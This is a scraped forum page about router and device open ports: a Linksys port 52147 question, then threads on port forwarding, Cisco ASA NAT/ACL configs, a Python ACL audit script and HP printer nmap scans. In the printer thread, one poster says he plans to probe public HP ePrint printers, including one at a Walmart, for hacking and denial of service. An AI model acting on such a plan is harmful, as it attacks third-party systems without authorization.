WRT1900AC - Open Port - 52147 - Security Vulnerability?

I recently noticed in the router logs incoming connections on port 52147. I have confirmed that this port on the router is open (not closed or stealthed), by using the port scan tool at www.grc.com.  See port scan screenshot below.
This situation is present with no devices connected to my internal network. My router is on the current firmware (1.1.8.164461).
Anyone have an idea what is going on?
Jeff
Incoming log
Source IP address | Destination port number
110.93.76.194          52147 
73.52.28.251            52147

Yes, I did set up a Smart Wifi account during initial setup.
Is there any documentation where I can confirm that the port is open for Smart Wifi services, and should I be concerned about the inbound connections listed in the log (see above)?
I am seeing a few more random IP addresses associated with that port in the log each day or so, and I would think that if it was due to legitimate Smart Wifi services activity, the traffic would be from a specific (and documented) address for Linksys servers.
UPDATE: I just checked the log again, and there are a dozen or so random IP addresses in the Incoming Log associated with port 52147. Who-Is lookups place these addresses all around the world. Until this is explained to my satisfaction, I am leaving my devices disconnected from this router, and treating this as a security vulnerability.
If anyone has any information or insight into this, it would be greatly appreciated.

Similar Messages

  • Can't update iOS 8 on my iPhone5 through iTunes on Windows 8 (error 3004, 3194). Updated host file, opened port 80, 443; turned off security system and firewall, etc. But nothing works. How to solve this problem?

    Hi the_mad_movies,
    It seems like this article will be the best option for addressing this issue:
    Error 3194, Error 17, or "This device isn't eligible for the requested build"
    http://support.apple.com/kb/ts4451
    Thanks for coming to the Apple Support Communities!
    Cheers,
    Braden

  • How do I open ports in Norton Security by Comcast?

    You should ask them or find a forum relating to Norton Security. There's a chance someone here may know but this forum is for Apple TV so you may not get the help you need.

  • What are the security risks for opening port 80 on workstations?

    Hello all,
    in our environment, there is an application which opens port 80 on workstations when installed, but it is not allowed on the perimeter FW
    could you please advise what are the security risks for leaving port 80 opened on the workstations? or it is considered secure unless it is not allowed on the perimeter FW?
    thanks a lot & regards

    Hi R.Naguib.
    The 80 port is open by default through the firewall on Windows system, it is used by a http protocol by a browser.
    As for the network or hardware Firewall settings, I suggest to turn to the network administrator for details.
    Regards
    Wade Liu
    TechNet Community Support

  • Risk & Security vulnerability for using default ports

    Dear All,
    As far as I know, Oracle does not recommend to use default ports for
    security purposes. Searching out of Oracle community found that some people
    think that it does not matter any more. However, it can have some vulnerability
    and, I think, security risk & auditors would not like to see that.
    I have found that in 2012 Oracle TNS listener port 1521 had a vulnerability
    issue with Oracle database 11gR1 and 11gR2, but how about Oracle 12?
    Also, I was searching something similar for Oracle OAM, SOA, OIM, OAAM, but still cannot
    find anything.
    Thanks
    Georgina Acuna-Rivera

    Do you happen to have such a storage peripheral attached to your M3000?
    If yes, then it is probably reachable through the M3000's IP address. You will need to log a support ticket with HP and get guidance how to get into the array's FCAL controller and investigate the issue.
    If you do not have an HP array attached to your M3000, then log a support case with Oracle and arrange for a field service engineer to visit the site to manipulate the password for its `admin` account (since that special account likely needs service-employee-only access).
    Either way, you need to get accurate technical support and this forum is NOT official tech-support.

  • HT202802 What "security vulnerability" will be opened by using this signing technique?

    Regarding article: HT202802
    OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
    The article says:
    Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
    1. What "security vulnerability" will be opened by using this signing technique?
    2. Does signing this way only make the App it's applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
    3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
    "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
    1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
    Thanks for the help in advance!

    1) There are a few system features, including accessibility, that will override any and all other security protections on your machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
    2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
    3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
    Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.

  • Opening Ports on Mac OS X 10.5.6

    I have two PC using Windows XP and one I Mac using Mac OS X 10.5.6 all on different levels.
    PC #1 (with the application I am trying to access) is connected to a network with a wireless router.
    The wireless router is hooked up to my I Mac.
    I keep getting a message related to fire wall protection and the need to open specific ports.
    Initially I had the wireless router hooked up to PC #2. I could access the application but the signal was too weak and the application could not run properly (got a message indicating this).
    The only option I had was to move the wireless router to the Mac.
    I now have a great signal but am unable to access the application.
    Anyone know how to open ports with an I Mac when you can't see the application from your Mac?

    I was just wondering if by making this router a bridge it would make the wireless portion of the network vulnerable to others within the network signal.
    No.
    Making "2nd router/WiFi" a bridge just means that "home router" is now the only router in your home network, and it is, and always has been, your primary hardware firewall between you and the nasty things that crawl around on the internet.
    A "bridge" just passes stuff from one side to the other side without messing with the IP addresses. In many ways it is similar to an ethernet switch, only in this case you are switching from ethernet to WiFi signals.
    With a "bridge" instead of having 2 subnets that can not talk to each other, you have a single subnet where all your home computers can see and talk to each other.
    Unless you do not trust "PC #1", as that is the only system that is now able to see the stuff on the WiFi side of the D-Link. And of course if you leave an ethernet cable dangling out a window for the neighborhood kids to plug in their laptops
    Making "2nd router/WiFi" a bridge does not change your WiFi security. It is what it always was. If you have no WiFi encryption enabled, then you never had security. If you have WEP encryption enabled, you have security that keeps honest neighbors honest, but anyone that wants to break in can do it in a few minutes with software easily available on the net. If you use WPA encryption with a good password, then you are in very good shape, and your WiFi has been and will remain secure (or as secure as is available with today's inexpensive consumer technology).
    By the way my router D link DIR-625 is not easy to turn into a bridge.
    Based on what I found on the net it's not that simple.
    Based on what I found reading the D-Link DIR-625 manual from the web, there is a section which talks about connecting to another router
    If you are connecting the D-Link router to another router to use as a wireless access point and/or switch, you will have to do the following before connecting the router to your network:
    • Disable UPnP™
    • Disable DHCP
    • Change the LAN IP address to an available address on your network. The LAN ports on the router cannot accept a DHCP address from your other router.
    There are more detailed instructions in the manual, but I figure I shouldn't reprint D-Link's manual in the forum. All I did was a Google search for "d-link DIR-625 manual".
    Now it is always possible I got the wrong manual, so your mileage will vary.

  • Default LaunchDaemons and open ports?

    I recently wrote a port scanner for a project at my university and after running it, I discovered that a large portion of my MacBook's well-known ports were open.
    These were 21 (ftp), 22 (ssh), 23 (telnet), 53 (domain), 79 (finger)!!, 88 (kerberos), 512 (exec)!!, 513 (login), and a bunch of others (see picture below for open ports - afterwards entered @ grc.com).
    I checked, if they are reachable from the internet (see picture below). They were not, but that does not say a lot(?), because if someone wanted to make a bot out of my Mac or collect data from it, this person could contact a C&C server from my machine and start communicating without opening any port of the NAT router, as the router allows bidirectional communication if started by the client(?).
    I checked, if these ports are reachable from within a local network, by requesting the services behind them from another computer running Linux. And they are! Everyone within the Non-VPN networks of my university was and is able to fetch personal information from me over fingerd! To prevent further leakage, I will block any incoming connections from now on.
    > finger user@{Macbook's IP}
    same output as when running locally
    > finger user@localhost
    [localhost]
    Trying ::1...
    Login: MyUserName         Name: MyNameReplaced
    Directory: /Users/MyUserName            Shell: /usr/local/bin/fish
    On since Sun Oct 26 13:02 (CET) on console, idle 7:52 (messages off)
    On since Sun Oct 26 17:15 (CET) on ttys000
    On since Sun Oct 26 20:25 (CET) on ttys001, idle 0:05
    No Mail.
    No Plan.
    I am able to login to the Mac via telnet over the LAN, etc.
    I checked the configuration of my firewall. It is/was activated. Signed software is allowed to accept incoming connections. Cloaking is not activated and I am not blocking every incoming connection. There are five services in the list below, they are all from Apple. I can not remove them. The minus button is grayed out.
    When I ticked 'Block all incoming connections', the services behind the ports were no longer detectable/reachable from the LAN, but the daemons are still running on the Mac!
    So my question is, why are these daemons running?! Why on earth is the fingerd running or exec?! This seems not normal. Who has started them (software or person)? I strongly limit access to my computer. I always lock it, when leaving it unattended. I use NoScript in Firefox. Never do I open attachments from mails.
    I checked the Mac of a friend with my PortScanner (in his LAN and on his Mac) and his has none of the ports open mine has.
    I have not checked my ports/firewall for a long time, so I can't remember if those ports were closed at any time before.
    Meanwhile I will read something about launchd, to gather more information.

    I'm not an expert on this, but I'm not certain what you are concerned about. All messaging in unix systems is done through ports, and so a variety of ports need to be open for normal system operations. OS X out-of-the-box probably strikes a balance between convenience and paranoia - ports that might be more secure closed left open by default so that novice users aren't driven out of their wits - but I can't imagine that it leaves open anything that constitutes a true vulnerability. Or if it does, you should file a bug report.
    I'm told every med student suffers from hypochondria at one point or another, and I know that every comp sci student will sooner or later have a short freak-out over security. So take a deep breath...

  • Help Opening PORT 6112 for WarCraftIII Hosting

    I'm trying to help my son use WarCraftIII to host a game in our iMac G5, but no one can join. Successful hosting is supposed to be an issue of opening port 6112 but no success yet.
    What I have done so far:
    1) Set Linksys BEFSR41 router to forward port 6112 both ways. Contacted blizzard tech support today and they told me I needed to open the port in Linksys router by following instructions at http://www.portforward.com for my router, and the WarCraft III game (fyi this is a very nice site, anyone with router setting issues should check it out). I went to the site, clicked on "Forward", found my router (Linksys BEFSR41v1.39) in the list below, then found my game WarCraft III in game list and followed instructions at this website: http://www.portforward.com/english/routers/portforwarding/Linksys/BEFSR41v1.40.2/WarcraftIII.htm
    2) Opened port 6112 in Mac OS FileSharing FireWall. I'm not so sure I got this part right. I went to System Prefs, File Sharing, FireWall and clicked New. Then I entered 6112 in both TCP and UDP (cause I don't know which it is) and selected Other and gave it the name WarcraftIII1 (used this name, because we were helping a friend set up his router (Linksys WRT54G) to pass 6112, and the portforward.com instructions had us enter that text in Application field for the port forwarding range: http://www.portforward.com/english/routers/portforwarding/Linksys/WRT54G/WarcraftIII.htm So, I figured this was as good a name as any to use in FireWall setting.
    Ideas I have not tried yet:
    1) Maybe I need to update my Linksys firmware? I noticed that the Portforward instructions were for Linksys firmware 1.40.2. My firmware is 1.39 (going to Linksys site I see there's a newer version v1.46.02 available). So, maybe I need to download and apply (but I don't want to screw up my current router settings - since they work! - and I'm figuring it's likely to lose all current settings with a firmware update).
    2) Maybe I need a different name in the FireWall port than "WarcraftIII1"? Maybe one of the pull-down options are what I should have used.
    Any help would be greatly appreciated!
    iMac G5   Mac OS X (10.4.6)   1.5 Gb RAM

    Hey Tim,
    Thanks for tip on preparing for firmware update. As it turns out, all settings were wiped when I did the update. But I like the approach of having 'clean' setup before update (sort of like running Disk Utility before and after new software installs).
    I tried turning off the Mac OS firewall, but it didn't help (so I don't think that's the root cause - but a good thing to test). Part of the www.portforward.com instructions for using my Linksys router with WarCraftIII include setting to DISABLE the "Block WAN Request" option. I don't know much about router security, but this makes me feel more vulnerable. So, I prefer to keep Mac OS firewall enabled, as long as it doesn't get in the way (also MacWorld's most recent issue recommended firewall ON, and activate Advanced settings turning ON options for Block UDP Traffic, and Enable Stealth Mode). Having my firewall set up in this way hasn't been any problem for me at all for past 1.5 yrs, until just recently when I tried hosting WarCraftIII Custom Game (reason I want to do that, is it allows my son to play online against only friends we know - call me overprotective, and I'll happily plead guilty). As a case in point, I was on the Battle.Net USEast Open Tech Support chat channel last night (you get to this from within the WarCraftIII application), asking if someone would do a quick test and join my Custom Game. During that brief interchange, one of the other people on the channel types in all caps "I want to f**k your mother" (without the *'s)". I'm thinking, yeah Custom Game is the way to go, I don't want my son out here with the likes of you. Thankfully, someone else agreed to the test. Unfortunately it failed.
    I think I've about got it beat though. I found on the blizzard.com support site, a way to use Terminal to run a traceroute by typing (without the quotes) "traceroute us.logon.worldofwarcraft.com > ~/Desktop/tracert.txt" and press the Return key. Previously I was getting all *'s back in the results (which means no recognized connections). Now, I'm getting IP addresses and ms timing for hops so it appears I'm getting through. http://www.blizzard.com/support/wow/?id=aww0827p5
    But, I've got to go and won't be able to test ability to join a Custom Game with my son's friend until later tonight.
    Thanks again. C

  • Help open port on ASA5510 (version 8.3)

    Hi all,
    I configured the ASA to open ports 21, 3389 and 5900 (outside access in), but when I check the ports only 21 and 3389 succeed; 5900 gives an error.
    If I configure only one port, 5900 or 3389, it's OK. I don't understand what the problem is.
    ASA5510>       
    ASA5510> ena           
    Password: ***********************                                
    ASA5510# show run                
    : Saved      
    ASA Version 8.3(1)                 
    hostname ASA5510               
    domain-name lohoi.local                      
    enable password *********************** encrypted                                         
    passwd *********************** encrypted                                
    names    
    interface Ethernet0/0                    
    description Connect_to_Modem                            
    nameif outside              
    security-level 0                
    ip address 10.0.0.2 255.255.255.0                                 
    interface Ethernet0/1                    
    description Connect_to_Router2911                                 
    nameif inside             
    security-level 100                  
    ip address 172.16.17.2 255.255.255.240                                      
    interface Ethernet0/2                    
    shutdown        
    no na   
    no security-level                 
    no ip address             
    interface Ethernet0/3                    
    shutdown        
    no nameif         
    no security-level                 
    no ip address             
    interface Management0/0                      
    description Management                      
    nameif management                 
    security-level 100                  
    ip address 192.168.1.1 255.255.255.0                                    
    ftp mode passive               
    clock timezone ICT 7                   
    dns server-group DefaultDNS                          
    domain-name lohoi.local                       
    object network obj-any                     
    subnet 0.0.0.0 0.0.0.0                      
    object network ftpserver                       
    host 192.168.88.90                  
    description FTP server                      
    object network Remote_Desktop                       
    host 192.168.100.29                   
    object network VNC                 
    host 192.168.100.4                  
    access-list 101 extended permit icmp any any                                           
    access-list 101 extended permit icmp any any echo-reply                                                      
    access-list 101 extended permit tcp any any                                          
    access-list outside_access_in extended permit tcp any object ftpserver eq ftp                                                                            
    access-list outside_in extended permit tcp any host 192.168.100.29                                                                 
    access-list outside_in extended permit tcp any host 192.168.100.4                                                                
    pager lines 24             
    mtu outside 1500               
    mtu inside 1500              
    mtu management 1500                  
    icmp unreachable rate-limit 1 burst                                
    asdm image disk0:/asdm-631.bin                             
    asdm history enable                  
    arp timeout 14400                
    object network obj-any                     
    nat (inside,outside) dynamic interface                                      
    object network ftpserver                       
    nat (inside,outside) static interface service tcp ftp ftp                                                         
    object network Remote_Desktop                            
    nat (inside,outside) static interface service tcp 3389 3389                                                           
    object network VNC                 
    nat (inside,outside) static interface service tcp 5900 5900                                                           
    access-group outside_in in interface outside                                           
    route outside 0.0.0.0 0.0.0.0 10.0.0.1 1                                       
    route inside 192.168.88.64 255.255.255.224 1                                          
    route inside 192.168.100.0 255.255.255.0 172.16.17.1 1                                                     
    timeout xlate 3:00:00                    
    timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02                                                                
    timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00                                                                             
    timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00                                                                              
    timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute                                                           
    timeout tcp-proxy-reassembly 0:01:00                                   
    dynamic-access-policy-record DfltAccessPolicy                                            
    aaa authentication ssh console LOCAL                                   
    http server enable                 
    http 192.168.1.0 255.255.255.0 management                                        
    http authentication-certificate inside                                     
    http authentication-certificate management                                         
    no snmp-server location                      
    no snmp-server contact                     
    snmp-server enable traps snmp authentication linkup linkdown coldstart                                                                     
    crypto ipsec security-association lifetime seconds 28800                                                       
    crypto ipsec security-association lifetime kilobytes 4608000                                                           
    telnet timeout 5               
    ssh 192.168.100.0 255.255.255.0 inside                                     
    ssh timeout 5            
    console timeout 0                
    threat-detection basic-threat                            
    threat-detection statistics access-list                                      
    no threat-detection statistics tcp-intercept                                           
    webvpn     
    username admin password *********************** encrypted privilege 15                                                              
    class-map inspection_default                           
    match default-inspection-traffic                                
    policy-map type inspect dns preset_dns_map                                         
    parameters          
      message-length maximum client auto                                   
      message-length maximum 512                           
    policy-map global_policy                       
    class inspection_default                        
      inspect dns preset_dns_map                           
      inspect ftp            
      inspect h323 h225                  
      inspect h323 ras                 
      inspect rsh            
      inspect rtsp             
      inspect esmtp              
      inspect sqlnet               
      inspect skinny               
      inspect sunrpc               
      inspect xdmcp              
      inspect sip            
      inspect netbios
      inspect tftp
      inspect ip-options
    service-policy global_policy global
    prompt hostname context
    call-home
    profile CiscoTAC-1
      no active
      destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService
      destination address email [email protected]
      destination transport-method http
      subscribe-to-alert-group diagnostic
      subscribe-to-alert-group environment
      subscribe-to-alert-group inventory periodic monthly
      subscribe-to-alert-group configuration periodic monthly
      subscribe-to-alert-group telemetry periodic daily
    Cryptochecksum:667cb3ec729681c78ccab9a57abd89df
    : end
    ASA5510#
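
An added example, not part of either post and not Cisco tooling: a small Python audit over lines taken from the `show run` listing above and from the second listing that follows, reporting which ACLs no `access-group` binds and, for each static NAT service, whether a bound ACL permits exactly the published port, every port on the host, or nothing. The function names and verdict labels are this example's own assumptions; it reads configuration text only and does not model first-match ordering or deny entries.

```python
import ipaddress

# Constructed input: selected object, ACL, NAT and access-group lines from the
# first "show run" listing above (FIRST_CFG) and the second one (SECOND_CFG).
FIRST_CFG = """\
object network ftpserver
host 192.168.88.90
object network Remote_Desktop
host 192.168.100.29
object network VNC
host 192.168.100.4
access-list 101 extended permit tcp any any
access-list outside_access_in extended permit tcp any object ftpserver eq ftp
access-list outside_in extended permit tcp any host 192.168.100.29
access-list outside_in extended permit tcp any host 192.168.100.4
object network ftpserver
nat (inside,outside) static interface service tcp ftp ftp
object network Remote_Desktop
nat (inside,outside) static interface service tcp 3389 3389
object network VNC
nat (inside,outside) static interface service tcp 5900 5900
access-group outside_in in interface outside
"""
SECOND_CFG = """\
object network ftpserver
host 192.168.88.90
object network remote_desktop
host 192.168.100.2
object network remote_vnc
host 192.168.100.4
access-list 101 extended permit tcp any any
access-list outside_access_in extended permit tcp any object ftpserver eq ftp
access-list outside_access_in extended permit tcp any host 192.168.100.4 eq 5900
access-list outside_access_in extended permit tcp any host 192.168.100.2 eq 3389
object network ftpserver
nat (inside,outside) static interface service tcp ftp ftp
object network remote_desktop
nat (inside,outside) static interface service tcp 3389 3389
object network remote_vnc
nat (inside,outside) static interface service tcp 5900 5900
access-group outside_access_in in interface outside
"""
PORT_NAMES = {"ftp": 21, "ssh": 22, "telnet": 23, "www": 80, "https": 443}

def _port(tok):
    return PORT_NAMES.get(tok) or int(tok)

def _addr(toks):
    """Consume 'any', 'host IP', 'object NAME' or 'IP MASK' from a token list."""
    if toks[0] == "any":
        return ("any", ""), toks[1:]
    kind = toks[0] if toks[0] in ("host", "object") else "net"
    value = toks[1] if kind != "net" else f"{toks[0]}/{toks[1]}"
    return (kind, value), toks[2:]

def _reaches(dst, name, ip):
    """True when an ACL destination covers the object `name` at real address `ip`."""
    kind, value = dst
    if kind == "net":
        return bool(ip) and ipaddress.ip_address(ip) in ipaddress.ip_network(value, strict=False)
    return kind == "any" or value in (name, ip)

def parse(cfg):
    """Return (acls, bound ACL names, object hosts, published NAT services)."""
    acls, bound, hosts, published, cur = {}, set(), {}, [], None
    for line in cfg.splitlines():
        t = line.split()
        if t[:2] == ["object", "network"]:
            cur = t[2]
        elif t[:1] == ["host"] and cur:
            hosts[cur] = t[1]
        elif t[:1] == ["nat"] and "service" in t and cur:
            i = t.index("service")  # service <proto> <real_port> <mapped_port>
            published.append((cur, t[i + 1], _port(t[i + 2])))
        elif t[:1] == ["access-group"]:
            bound.add(t[1])
        elif t[:1] == ["access-list"] and t[2:3] == ["extended"]:
            _, rest = _addr(t[5:])       # source address, not needed here
            dst, rest = _addr(rest)
            ports = None                 # None: the entry names no port
            if rest[:1] == ["eq"]:
                ports = (_port(rest[1]), _port(rest[1]))
            elif rest[:1] == ["range"]:
                ports = (_port(rest[1]), _port(rest[2]))
            acls.setdefault(t[1], []).append((t[3], t[4], dst, ports))
    return acls, bound, hosts, published

def audit(cfg):
    """Return unbound ACL names and, per NAT service, 'all-ports', 'exact' or 'none'."""
    acls, bound, hosts, published = parse(cfg)
    services = {}
    for name, proto, port in published:
        hits = [ports for acl in bound for action, p, dst, ports in acls.get(acl, [])
                if action == "permit" and p in (proto, "ip")
                and _reaches(dst, name, hosts.get(name, ""))]
        broad = any(h is None for h in hits)                    # permit with no port
        exact = any(h and h[0] <= port <= h[1] for h in hits)   # permit names the port
        services[name] = "all-ports" if broad else "exact" if exact else "none"
    return {"unbound": sorted(set(acls) - bound), "services": services}
```

`audit(FIRST_CFG)` and `audit(SECOND_CFG)` return the two reports side by side; an ACL listed under `unbound` has entries that no interface evaluates.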

    ASA5510# show run                
    : Saved      
    ASA Version 8.3(1)                 
    hostname ASA5510               
    domain-name lohoi.local                      
    enable password ****************** encrypted                                         
    passwd ****************** encrypted                                
    names    
    interface Ethernet0/0                    
    description Connect_to_Modem                            
    nameif outside              
    security-level 0                
    ip address 10.0.0.2 255.255.255.0                                 
    interface Ethernet0/1                    
    description Connect_to_Router2911                                 
    nameif inside             
    security-level 100                  
    ip address 172.16.17.2 255.255.255.240                                      
    interface Ethernet0/2                    
    shutdown        
    no nameif         
    no security-level                 
    no ip address             
    interface Ethernet0/3                    
    shutdown        
    no nameif         
    no security-level                 
    no ip address             
    interface Management0/0                      
    description Management                      
    nameif management                 
    security-level 100                  
    ip address 192.168.1.1 255.255.255.0                                    
    ftp mode passive               
    clock timezone ICT 7                   
    dns server-group DefaultDNS                          
    domain-name lohoi.local                       
    object network obj-any                     
    subnet 0.0.0.0 0.0.0.0                      
    object network ftpserver                       
    host 192.168.88.90                  
    description FTP server                      
    object network remote_desktop                            
    host 192.168.100.2                  
    object network remote_vnc                        
    host 192.168.100.4                  
    access-list 101 extended permit icmp any any                                           
    access-list 101 extended permit icmp any any echo-reply                                                      
    access-list 101 extended permit tcp any any                                          
    access-list outside_access_in extended permit tcp any object ftpserver eq ftp                                                                            
    access-list outside_access_in extended permit tcp any host 192.168.100.4 eq 5900                                                                               
    access-list outside_access_in extended permit tcp any host 192.168.100.2 eq 3389                                                                               
    pager lines 24             
    mtu outside 1500               
    mtu inside 1500              
    mtu management 1500                  
    icmp unreachable rate-limit 1 burst-size 1                                         
    asdm image disk0:/asd                  
    asdm history enable                  
    arp timeout 14400                
    object network obj-any                     
    nat (inside,outside) dynamic interface                                      
    object network ftpserver                       
    nat (inside,outside) static interface service tcp ftp ftp                                                         
    object network remote_desktop                            
    nat (inside,outside) static interface service tcp 3389 3389                                                           
    object network remote_vnc                        
    nat (inside,outside) static interface service tcp 5900 5900                                                           
    access-group outside_access_in in interface outside                                                  
    route outside 0.0.0.0 0.0.0.0 10.0.0.1 1                                       
    route inside 192.168.88.64 255.255.255.224 172.16.17.1 1                                                       
    route inside 192.168.100.0 255.255.255.0 172.16.17.1 1                                                     
    timeout xlate 3:00:00                    
    timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02                                                                
    timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00                                                                             
    timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00                                                                              
    timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute                                                           
    timeout tcp-proxy-reassembly 0:01:00                                   
    dynamic-access-policy-record DfltAccessPolicy                                            
    aaa authentication ssh console LOCAL                                   
    http server enable                 
    http 192.168.1.0 255.255.255.0 management                                        
    http authentication-certificate inside                                     
    http authentication-certificate management                                         
    no snmp-server location                      
    no snmp-server contact                     
    snmp-server enable traps snmp authentication linkup linkdown coldstart                                                                     
    crypto ipsec security-association lifetime seconds 28800                                                       
    crypto ipsec security-association lifetime kilobytes 4608000                                                           
    telnet timeout 5               
    ssh 192.168.100.0 255.255.255.0 inside                                     
    ssh timeout 5            
    console timeout 0                
    threat-detection basic-threat                            
    threat-detection statistics access-list                                      
    no threat-detection statistics tcp-intercept                                           
    webvpn     
    username admin password ****************** encrypted privilege 15                                                              
    class-map inspection_default                           
    match default-inspection-traffic                                
    policy-map type inspect dns preset_dns_map                                         
    parameters          
      message-length maximum client auto                                   
      message-length maximum 512                           
    policy-map global_policy                       
    class inspection_default                        
      inspect dns preset_dns_map                           
      inspect ftp            
      inspect h323 h225                  
      inspect h323 ras                 
      inspect rsh            
      inspect rtsp             
      inspect esmtp              
      inspect sqlnet               
      inspect skinny               
      inspect sunrpc               
      inspect xdmcp              
      inspect sip
      inspect netbios
      inspect tftp
      inspect ip-options
    service-policy global_policy global
    prompt hostname context
    call-home
    profile CiscoTAC-1
      no active
      destination address http https://tools.cisco.com/its/service/oddce/services/DD
    CEService
      destination address email [email protected]
      destination transport-method http
      subscribe-to-alert-group diagnostic
      subscribe-to-alert-group environment
      subscribe-to-alert-group inventory periodic monthly
      subscribe-to-alert-group configuration periodic monthly
      subscribe-to-alert-group telemetry periodic daily
    Cryptochecksum:4f061a213185354518601f754e41494c
    : end
    ASA5510#
    So I configured it again, but I'm not able to access port 5900.

  • Open port issues with Direct Print functionality

    Hi, I have been fighting with HP call support about the Photosmart 7525 printer.
    Originally I setup and had performed all the functions to enable both web support and WIFI.
    Within an hour the printer would not respond to wireless communication, though it had its wireless indicator showing it was connected.
    I was told by HP support that the issue will be resolved in March, as there will be a firmware update to fix the issue.
    Now that I had the printer install the new firmware I still get the issue.
    Though I found through some sniffing, that there are a number of ports enabled and open that are over and beyond print requirements.
    Funny thing I can send my printer into instant lockup with all lights flashing with a simple UDP ping sniff. I would think I can do this with other new HP printers using Eprint functions. I will find HP web based printers that are open for public printing and test my theory that HP Eprinters are open to hacking and denial of service attempts.  My HP print app on Android lists three in my area, and one is at my local Walmart. This would be cool to find this, as I am usually not the first to point such matters out.
    I assume some are for Apple devices to print.
    Here is my sniffing report:
    Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 07:57 Central Daylight Time
    NSE: Loaded 110 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 07:57
    Scanning 192.168.223.1 [1 port]
    Completed ARP Ping Scan at 07:57, 0.23s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 07:57
    Completed Parallel DNS resolution of 1 host. at 07:58, 16.50s elapsed
    Initiating SYN Stealth Scan at 07:58
    Scanning 192.168.223.1 [1000 ports]
    Discovered open port 445/tcp on 192.168.223.1
    Discovered open port 139/tcp on 192.168.223.1
    Discovered open port 80/tcp on 192.168.223.1
    Discovered open port 443/tcp on 192.168.223.1
    Discovered open port 8080/tcp on 192.168.223.1
    Discovered open port 9220/tcp on 192.168.223.1
    Discovered open port 6839/tcp on 192.168.223.1
    Discovered open port 631/tcp on 192.168.223.1
    Discovered open port 7435/tcp on 192.168.223.1
    Discovered open port 8089/tcp on 192.168.223.1
    Discovered open port 9100/tcp on 192.168.223.1
    Completed SYN Stealth Scan at 07:58, 1.71s elapsed (1000 total ports)
    Initiating UDP Scan at 07:58
    Scanning 192.168.223.1 [1000 ports]
    Discovered open port 5353/udp on 192.168.223.1
    Completed UDP Scan at 07:58, 1.82s elapsed (1000 total ports)
    Initiating Service scan at 07:58
    Scanning 20 services on 192.168.223.1
    Discovered open port 161/udp on 192.168.223.1
    Discovered open|filtered port 161/udp on 192.168.223.1 is actually open

    Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 07:51 Central Daylight Time
    Nmap scan report for 192.168.223.1
    Host is up (0.0025s latency).
    Not shown: 93 closed ports
    PORT     STATE SERVICE     VERSION
    80/tcp   open  http        HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    139/tcp  open  tcpwrapped
    443/tcp  open  ssl/http    HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    445/tcp  open  netbios-ssn
    631/tcp  open  http        HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    8080/tcp open  http        HP Photosmart 7520 series printer http config (Serial TH3AS711XZ05YZ)
    9100/tcp open  jetdirect?
    MAC Address: A03:C1:BD:C8:34 (Unknown)
    Device type: printer|general purpose
    Running: HP embedded, Wind River VxWorks
    OS CPE: cpe:/h:hp:laserjet_cm1415fnw cpe:/h:hp:laserjet_cp1525nw cpe:/h:hp:laserjet_1536dnf cpe:/o:windriver:vxworks
    OS details: HP LaserJet CM1415fnw, CP1525nw, or 1536dnf printer, VxWorks
    Network Distance: 1 hop
    Service Info: Device: printer; CPE: cpe:/h:hphotosmart_7520
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 34.11 seconds

    OK now I am able to run a full scan on TCP ports without causing a lock up of the printer.
    I found that having the printer connect to a router that has been setup to use channel 5, 6 or 7 will cause port scanning issues with the printer.
    It is obvious that there are 18 ports that are seen as open, whether they are used or not. Two of which are active but have no service connected to them. Some are just dead like port 25, but over half are active enough to receive data and lock network connectivity within the printer.
    As the firmware states some other laser jets may be affected depending on how the configuration can be set.
    I moved my router's channel to channel 1 as it is the only other option I have in a highly congested location. It is not as good as channel 6, but the printer seems to have channel 6 locked in for direct printing.
    Here is the latest full scan with UDP enabled, it is the furthest and most complete scan I am able to complete, with UDP ports enabled. The TCP port scan has a bit more and I have placed a simple list below the information given here:
    Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-21 13:27 Central Daylight Time
    NSE: Loaded 110 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 13:27
    Scanning 192.168.1.211 [1 port]
    Completed ARP Ping Scan at 13:27, 0.44s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 13:27
    Completed Parallel DNS resolution of 1 host. at 13:27, 0.03s elapsed
    Initiating SYN Stealth Scan at 13:27
    Scanning 192.168.1.211 [1000 ports]
    Discovered open port 443/tcp on 192.168.1.211
    Discovered open port 80/tcp on 192.168.1.211
    Discovered open port 139/tcp on 192.168.1.211
    Discovered open port 8080/tcp on 192.168.1.211
    Discovered open port 445/tcp on 192.168.1.211
    Discovered open port 631/tcp on 192.168.1.211
    Discovered open port 9100/tcp on 192.168.1.211
    Discovered open port 7435/tcp on 192.168.1.211
    Discovered open port 9220/tcp on 192.168.1.211
